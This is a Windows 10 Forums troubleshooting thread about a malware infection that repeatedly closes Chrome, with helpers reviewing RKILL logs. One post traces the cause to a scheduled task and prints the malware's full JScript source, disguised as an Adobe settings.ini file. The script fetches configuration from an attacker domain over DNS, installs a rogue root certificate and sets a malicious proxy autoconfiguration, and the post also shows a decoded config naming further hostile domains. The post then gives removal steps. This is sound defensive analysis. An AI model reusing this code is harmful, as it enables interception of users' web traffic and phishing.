
  1. Joined : Dec 2015
    Posts : 21
    10 64bit
       18 Dec 2015 #31

    simrick said:
    Whoa! I have never, in all my years cleaning viruses off computers, seen an RKILL log like that!
    Has your computer been running slow at all? It appears as if your entire Windows OS is loaded with reparse junctions that point to nowhere.

    These are nothing - video files from ASUS

    This legitimate dll file has a reparse point to nowhere - that is suspicious, and why I ask if your computer was running slow. Zeroaccess is part of a botnet which either runs clickfraud or bitcoin mining.

    And the list goes on and on for reparse points - thousands of them. Honestly, I've never seen anything like this.

    You've got a major problem with your hosts file.

    I will tell you what I would do at this point: either do a clean install, completely formatting your hard drive, or post for help at Bleeping Computer, to see if they are able to sort things.

    The hosts file additions are mine. Those are all Adobe IPs that I am blocking.

    The rest, I'm not sure why RKILL shows all those. The first time I ran Rkill it didn't have any of that. I did post on Bleepingcomputer but no one responded yet. Btw, no, my computer runs as fast as ever, no issues at all. -- I just ran Rkill again and it didn't have all that stuff (see attachment). So strange... Just rebooted and ran Rkill again and it's still fine. Maybe it was a fluke?

    Thanks for the help
    Attached Files


  2. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       18 Dec 2015 #32

    mixolyd said:
    The hosts file additions are mine. Those are all Adobe IPs that I am blocking
    Ah, that explains it - I did look up a couple and one said Adobe in CA, another said something in VA...

    mixolyd said:
    The rest, I'm not sure why RKILL shows all those. The first time I ran Rkill it didn't have any of that. I did post on Bleepingcomputer but no one responded yet.
    Yes, be patient with them - they are inundated, but they are top-notch, and will work with someone until everything is completed - they never give up.

    mixolyd said:
    Btw, no my computer runs as fast as ever, no issues at all.
    Great!

    mixolyd said:
    -- I just ran Rkill again and it didn't have all that stuff (see attachment). So strange... Just rebooted and ran Rkill again and it's still fine. Maybe it was a fluke?

    Thanks for the help
    Could be - I know the "missing services" is.
    Your new RKILL log looks much better now.

    Your logs over at BC show:
    GroupPolicyScripts: Restriction <======= ATTENTION
    GroupPolicyScripts\User: Restriction <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION

    This might be the problem, unless you are specifically using Group Policy on your rig.

    EDIT: I would say, now that you've posted there, and have a starting point, I wouldn't do anything else to the computer until they give you some instruction.


  3. Joined : Dec 2015
    Posts : 21
    10 64bit
       18 Dec 2015 #33

    simrick said:
    [quotes post #32 above in full]
    Thanks for the help!


  4. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       18 Dec 2015 #34

    mixolyd said:
    Thanks for the help!
    No problem - good luck and keep us posted here of how it goes!


  5. Joined : Dec 2015
    Posts : 21
    10 64bit
       21 Dec 2015 #35

    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now, so I'm guessing it's gone.


  6. Joined : Dec 2015
    Posts : 5
    Windows 8.1
       21 Dec 2015 #36

    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure you that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window flashing always happened at 18:00, so I searched in the Task Scheduler. Bingo:

    [Attached image: 56011f2df029b4f4b417fec7d7f11bbf.png]
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as an INI. Stripped of all the comments, these are its contents:
    Code:
    var ns, no, re, rs, st, reg, pac;
    var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      // Configuration is fetched as a DNS TXT record of the form "<PAC URL>|<certificate URL>"
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      // Only act when the configured AutoConfigURL is not already the served one
      if (reg != pac) {
        // Close the browsers so the new proxy settings apply on the next start
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          // Download the certificate and add it to the user's trusted Root store
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          // Point Internet Settings at the served PAC and disable the auto-proxy result cache
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    ;
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make that fake Google work over https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by the Fiddler free web debugging proxy, and that it shows on my installed certs as this:

    [Attached image: donottrust.png]
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one is localhost.world, from where those smelly proxy settings are pulled, and the other is mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is, but it involves more domains. What is clear is that this is obviously malware, probably an attempt at phishing. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.

    Oh, I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that no proxy is set.


  7. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #37

    mixolyd said:
    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now so I'm guessing it's gone
    Glad to hear it!


  8. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #38

    moraleja39 said:
    [quotes post #36 above in full]
    Wow! That's some detective work!


  9. Joined : Apr 2015
    Posts : 9,178
    W10Prox64
       21 Dec 2015 #39

    mixolyd said:
    If anyone here has problems from this annoying virus like I did with Chrome closing, post on Bleepingcomputer and they will help you out. I haven't had the problem for about 4 days now so I'm guessing it's gone
    So, are you going to ask him if he thinks you really had a Zeroaccess infection?


  10. Joined : Dec 2015
    Posts : 21
    10 64bit
       21 Dec 2015 #40

    moraleja39 said:
    [quotes post #36 above in full]
    Never mind, my issue was not resolved. Thanks so much for posting this. Looks like I have the same task in my Task Scheduler.


 
Windows 10 Forums